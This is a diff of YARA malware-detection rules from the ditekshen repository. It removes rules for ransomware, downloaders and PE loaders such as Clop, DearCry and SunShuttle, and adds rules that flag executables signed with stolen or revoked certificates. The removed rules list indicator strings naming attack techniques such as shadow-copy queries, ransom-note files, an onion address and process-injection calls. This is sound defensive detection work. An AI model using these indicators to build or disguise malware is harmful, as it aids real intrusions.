-		id = "4147294a-7eff-595a-ad4f-8a84ffff960f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "db43ed73-de46-526e-a255-137a4eaaedce"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4829-L4847"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1153-L1164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e"
+		logic_hash = "0afeb50b36d0ca1adbd6cb3accccb3ee093434b8c0bd8b03ae70ecc45c7423b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Kitty" wide
-		$s2 = "-path" fullword wide
-		$s3 = "select * from Win32_ShadowCopy" fullword wide
-		$s4 = "Win32_ShadowCopy.ID='%s'" fullword wide
-		$s5 = "programdata" fullword wide
-		$s6 = "$recycle.bin" fullword wide
-		$s7 = ".crypt" fullword wide
-		$s8 = "%s/secret/%S" wide
-		$s9 = "decrypts3nln3tic.onion" wide
-		$n1 = "read_me_lkd.txt" wide
-		$n2 = "DECRYPT_NOTE.txt" wide
+		thumbprint = "eeeb3a616bb50138f84fc0561d883b47ac1d3d3d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 1 of ( $n* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x90\\x89\\xE5\\x90\\x89\\xD0\\x98\\xE5\\x90\\x89\\xD0\\x98\\xE4\\xB8\\x9D\\xE4\\xB8\\x9D" and pe.signatures [ i ] . serial == "3a:72:72:48:e1:94:0c:5b:f9:1a:46:6b:29:c3:b9:cd" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ce40906451925405D0F6C130Db461F71 : FILE
 {
 	meta:
-		description = "Detects delf downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a45afe84-15ae-528a-ad7e-ab9f03045789"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5e858504-b1c4-579e-b0e8-f6cf4f434672"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4849-L4867"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1166-L1177"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406"
+		logic_hash = "02b03b18942cff20ddce429f7be7cc9e54dfbf4884c79c7438c9b9d4415c5b93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii
-		$s2 = "SOFTWARE\\Borland\\Delphi" ascii
-		$s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii
-		$o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 }
-		$o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 }
-		$o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e }
-		$o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 }
-		$o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 }
-		$o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff }
-		$x1 = "22:40:08        \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii
-		$x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii
+		thumbprint = "af79bbdb4fa0724f907343e9b1945ffffb34e9b3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $s* ) and 5 of ( $o* ) ) or ( all of ( $s* ) and 2 of ( $o* ) ) or ( all of ( $x* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xD0\\xA5\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x96\\xAF\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xD0\\xA5\\xE6\\x96\\xAF\\xD0\\xA5\\xD0\\xA5\\xE6\\x96\\xAF\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x9D\\xB0" and pe.signatures [ i ] . serial == "00:ce:40:90:64:51:92:54:05:d0:f6:c1:30:db:46:1f:71" )
 }
-rule DITEKSHEN_MALWARE_Win_Clop : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E130D3537E0B7A4Dda47B4D6F95F9481 : FILE
 {
 	meta:
-		description = "Detects Clop ransomware variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d3c9e950-8b03-5d19-8448-9cf208813df2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "efcc63ba-51f9-5b16-a33d-05d536efa6c6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4869-L4889"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1179-L1190"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44"
+		logic_hash = "c394a115fa3fbd7fb2838b61b3c439df3daa9aa44b1901d1740060df0539411e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Cllp^_-" ascii
-		$s2 = "temp.dat" fullword wide
-		$s3 = "README_README.txt" wide
-		$s4 = "BEGIN PUBLIC KEY" ascii
-		$s5 = "runrun" wide
-		$s6 = "wevtutil.exe" ascii
-		$s7 = "%s%s.Cllp" fullword wide
-		$s8 = "WinCheckDRVs" fullword wide
-		$o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 }
-		$o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 }
-		$o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 }
-		$o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 }
-		$o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b }
+		thumbprint = "89f9786c8cb147b1dd7aa0eb871f51210550c6f4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $s* ) or 4 of ( $o* ) ) ) or ( all of ( $o* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 4 of ( $o* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xBC\\x8A\\xE6\\x96\\xAF\\xE8\\x89\\xBE\\xE4\\xBC\\x8A\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92" and pe.signatures [ i ] . serial == "00:e1:30:d3:53:7e:0b:7a:4d:da:47:b4:d6:f9:5f:94:81" )
 }
-rule DITEKSHEN_MALWARE_Win_Maktub : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4Bec555C48Aada75E83C09C9Ad22Dc7C : FILE
 {
 	meta:
-		description = "Detects Maktub ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "be47d858-8497-593f-865b-c3d3a5db6c2e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "664b8f55-03f8-5f36-aaf7-60ee4e613af4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4891-L4905"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1192-L1203"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69"
+		logic_hash = "de4562f70bbe25aa053f2476efca12b99cd4f2ee721df620d02d004bac2a59f9"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Content-Disposition: attachment; filename=" ascii
-		$s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii
-		$s3 = "/tor/status-vote/current/consensus" ascii
-		$s4 = "/tor/server/fp/" ascii
-		$s5 = "/tor/rendezvous2/" ascii
-		$s6 = "404 Not found" fullword ascii
-		$s7 = /_request@\d+/ fullword ascii
+		thumbprint = "a2be2ab16e3020ddbff1ff37dbfe2d736be7a0d5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xE5\\xB1\\x81\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE5\\x90\\x89\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE4\\xB8\\x9D\\xE5\\xB1\\x81" and pe.signatures [ i ] . serial == "4b:ec:55:5c:48:aa:da:75:e8:3c:09:c9:ad:22:dc:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009356E0361Bcf983Ab14276C332F814E7 : FILE
 {
 	meta:
-		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6b5966d7-59ab-5d8a-936e-71b937424234"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4907-L4920"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1205-L1216"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4"
+		logic_hash = "e85adfa9c004a46fe6060a36def3f8387de1484eb9fc3ae935d00265da135eab"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$rp1 = "GetType('RunPe.RunPe'" ascii
-		$rp2 = "GetType(\"RunPe.RunPe\"" ascii
-		$rm1 = "GetMethod('Run'" ascii
-		$rm2 = "GetMethod(\"Run\"" ascii
-		$s1 = ".Invoke(" ascii
-		$s2 = "[Reflection.Assembly]::Load(" ascii
+		tags = "FILE"
+		thumbprint = "f8bc145719666175a2bb3fcc62e0f3b2deccb030"
+		importance = 20
 
 	condition:
-		all of ( $s* ) and 1 of ( $rp* ) and 1 of ( $rm* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE5\\x90\\x89\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE6\\x9D\\xB0\\xE5\\x90\\x89\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "00:93:56:e0:36:1b:cf:98:3a:b1:42:76:c3:32:f8:14:e7" )
 }
-rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E5D20477E850C9F35C5C47123Ef34271 : FILE
 {
 	meta:
-		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "08261054-bebc-58fe-949a-27f6e817003a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c8777008-b15f-58c8-9172-f54a4864d2cc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4922-L4934"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1218-L1229"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb"
+		logic_hash = "984f6dba8613ca43a9ffdcba63e57516bd2c6df02698b87aa4a080f89cc6abc0"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "'.Replace('" ascii nocase
-		$s2 = "'aspnet_compiler.exe'" ascii
-		$s3 = "[Byte[]]$" ascii
-		$pe1 = "(77,90," ascii
-		$pe2 = "='4D5A" ascii
+		tags = "FILE"
+		thumbprint = "d11431836db24dcc3a17de8027ab284a035f2e4f"
+		importance = 20
 
 	condition:
-		all of ( $s* ) and ( #pe1 > 1 or #pe2 > 1 ) and #s1 > 4
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\x89\\xBE\\xE5\\x8B\\x92\\xD0\\x92\\xE8\\xB4\\x9D\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xE8\\xB4\\x9D\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\xB4\\x9D\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92" and pe.signatures [ i ] . serial == "00:e5:d2:04:77:e8:50:c9:f3:5c:5c:47:12:3e:f3:42:71" )
 }
-rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C865D49345F1Ed9A84Bea40743Cdf1D7 : FILE
 {
 	meta:
-		description = "Detects PE loader / injector. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "262dedee-05d2-5783-b0ff-24470d310ab8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2ef45336-bb59-5510-af6f-29e41c9258b9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4936-L4950"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1231-L1242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d"
+		logic_hash = "1a43e85e8c8d254dc3ba48ee9be5c233818fd6137967cd0235e802a2de1f9564"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "commandLine'" fullword ascii
-		$s2 = "RunPe.dll" fullword ascii
-		$s3 = "HandleRun" fullword ascii
-		$s4 = "inheritHandles" fullword ascii
-		$s5 = "BlockCopy" fullword ascii
-		$s6 = "WriteProcessMemory" fullword ascii
-		$s7 = "startupInfo" fullword ascii
+		thumbprint = "d5e8afa85c6bf68d31af4a04668c3391e48b24b7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB0\\x94\\xE5\\x93\\xA6\\xD0\\x93\\xE8\\x89\\xBE\\xE5\\xB1\\x81\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE7\\xBB\\xB4\\xE5\\x93\\xA6\\xE8\\x89\\xBE\\xE5\\xB0\\x94\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:c8:65:d4:93:45:f1:ed:9a:84:be:a4:07:43:cd:f1:d7" )
 }
-rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_29F2093E925B7Fe70A9Ba7B909415251 : FILE
 {
 	meta:
-		description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "09823302-34e0-5283-9740-1475ab8077be"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "51c21421-18e4-52df-8fe7-75db7141824c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4952-L4963"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1244-L1255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700"
+		logic_hash = "9b3c6a0571c096e431594d9331b3ae8127b02cc3cdf1e994a113026d77bbae4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Managament.inf" fullword ascii
-		$x2 = "rOnAlDo" fullword ascii
-		$x3 = "untimeResourceSet" fullword ascii
-		$x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii
+		thumbprint = "f9fc647988e667ec92bdf1043ea1077da8f92ccc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x99\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xE4\\xB8\\x9D\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "29:f2:09:3e:92:5b:7f:e7:0a:9b:a7:b9:09:41:52:51" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0889E4181E71B16C4A810Bee38A78419 : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e3450f93-7c57-5386-a901-bc5e710657a4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e9ada9f1-4b52-5da6-ba82-3ea2625ccefd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4965-L4975"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1257-L1268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567"
+		logic_hash = "2411f7ac79d18af295d77078c6e1c98c5a116ab24125c08946cb6ca09c28bc7b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920122"
-		snort3_sid = "920119"
-
-	strings:
-		$pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide
+		thumbprint = "bce3c17815ec9f720ba9c59126ae239c9caf856d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $pat and #pat > 1
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE5\\xBC\\x97\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE5\\x90\\xBE" and pe.signatures [ i ] . serial == "08:89:e4:18:1e:71:b1:6c:4a:81:0b:ee:38:a7:84:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C1Afabdaa1321F815Cdbb9467728Bc08 : FILE
 {
 	meta:
-		description = "Detects DoejoCrypt / DearCry ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e7904179-672a-5668-8b6d-f7f7090678fb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4977-L4993"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1270-L1281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0"
+		logic_hash = "be637a192a90a35be9879d5e36fb3cf9a56ca4158329d6b1fad458e2d05e3d26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DEARCRY!" fullword ascii
-		$s2 = ".CRYPT" fullword ascii
-		$s3 = "\\EncryptFile -svcV2\\" ascii
-		$s4 = "please send me the following hash!" ascii
-		$s5 = "dear!!!" fullword ascii
-		$s6 = "/readme.txt" fullword ascii
-		$o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff }
-		$o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a }
-		$o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 }
+		thumbprint = "e9c5fb9a7d3aba4b49c41b45249ed20c870f5c9e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and ( 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xD0\\x93\\xE5\\x84\\xBF\\xD0\\x93\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\x8B\\x92\\xD0\\x93\\xD0\\x93\\xE5\\x84\\xBF\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x93\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x92\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93" and pe.signatures [ i ] . serial == "00:c1:af:ab:da:a1:32:1f:81:5c:db:b9:46:77:28:bc:08" )
 }
-rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_371381A66Fb96A07077860Ae4A6721E1 : FILE
 {
 	meta:
-		description = "Detects SunShuttle / GoldMax"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cd9c9965-922c-5ced-839c-97d1dcde33ff"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4995-L5017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1283-L1294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0"
+		logic_hash = "f087df37fdb6d921f411f130f26f9b5a58c36ae163bc88565178e0ed12be79d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.beaconing" fullword ascii
-		$s2 = "main.clean_file" fullword ascii
-		$s3 = "main.decrypt" fullword ascii
-		$s4 = "main.define_internal_settings" fullword ascii
-		$s5 = "main.delete_empty" fullword ascii
-		$s6 = "main.encrypt" fullword ascii
-		$s7 = "main.false_requesting" fullword ascii
-		$s8 = "main.removeBase64Padding" fullword ascii
-		$s9 = "main.resolve_command" fullword ascii
-		$s10 = "main.retrieve_session_key" fullword ascii
-		$s11 = "main.save_internal_settings" fullword ascii
-		$s12 = "main.send_command_result" fullword ascii
-		$s13 = "main.send_file_part" fullword ascii
-		$s14 = "main.wget_file" fullword ascii
-		$s15 = "main.write_file" fullword ascii
+		thumbprint = "c4419f095ae93d93e145d678ed31459506423d6a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xBB\\xB4\\xD0\\xA9\\xE5\\x90\\xBE\\xE7\\xBB\\xB4\\xD0\\xA9\\xD0\\xA9\\xE7\\xBB\\xB4\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE6\\x9D\\xB0\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\xA8\\x9C\\xD0\\xA9" and pe.signatures [ i ] . serial == "37:13:81:a6:6f:b9:6a:07:07:78:60:ae:4a:67:21:e1" )
 }
-rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Deb004E56D7Fcec1Caa8F2928D4E768 : FILE
 {
 	meta:
-		description = "Detects RanzyLocker / REntS ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bb4e62b1-3528-56db-b004-1d590ad1ee61"
